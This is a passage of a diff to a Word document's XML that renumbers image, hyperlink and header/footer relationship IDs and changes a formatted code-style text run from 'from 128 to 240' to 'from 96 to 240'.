+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
         <w:t xml:space="preserve">about </w:t>
       </w:r>
       <w:r>
@@ -6909,7 +7003,27 @@
           <w:sz w:val="13"/>
           <w:szCs w:val="13"/>
         </w:rPr>
-        <w:t>from 128 to 240;</w:t>
+        <w:t xml:space="preserve">from </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>96</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to 240;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7964,7 +8078,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28">
+                    <a:blip r:embed="rId29">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -8054,7 +8168,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId30"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8133,7 +8247,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId31"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8187,7 +8301,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId32"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9633,7 +9747,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9722,7 +9836,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33"/>
+                    <a:blip r:embed="rId34"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9847,7 +9961,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId34">
+                    <a:blip r:embed="rId35">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9914,7 +10028,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId35">
+                    <a:blip r:embed="rId36">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -10146,7 +10260,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10251,7 +10365,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId37"/>
+                    <a:blip r:embed="rId38"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -11081,7 +11195,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId38">
+                    <a:blip r:embed="rId39">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -11429,7 +11543,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId28"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -15090,7 +15204,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId39"/>
+                    <a:blip r:embed="rId40"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -15201,7 +15315,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId40">
+                    <a:blip r:embed="rId41">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -15344,7 +15458,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> available on: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId41" w:history="1">
+      <w:hyperlink r:id="rId42" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="ae"/>
@@ -15376,12 +15490,12 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId42"/>
-      <w:headerReference w:type="default" r:id="rId43"/>
-      <w:footerReference w:type="even" r:id="rId44"/>
-      <w:footerReference w:type="default" r:id="rId45"/>
-      <w:headerReference w:type="first" r:id="rId46"/>
-      <w:footerReference w:type="first" r:id="rId47"/>
+      <w:headerReference w:type="even" r:id="rId43"/>
+      <w:headerReference w:type="default" r:id="rId44"/>
+      <w:footerReference w:type="even" r:id="rId45"/>
+      <w:footerReference w:type="default" r:id="rId46"/>
+      <w:headerReference w:type="first" r:id="rId47"/>
+      <w:footerReference w:type="first" r:id="rId48"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
       <w:cols w:space="425"/>
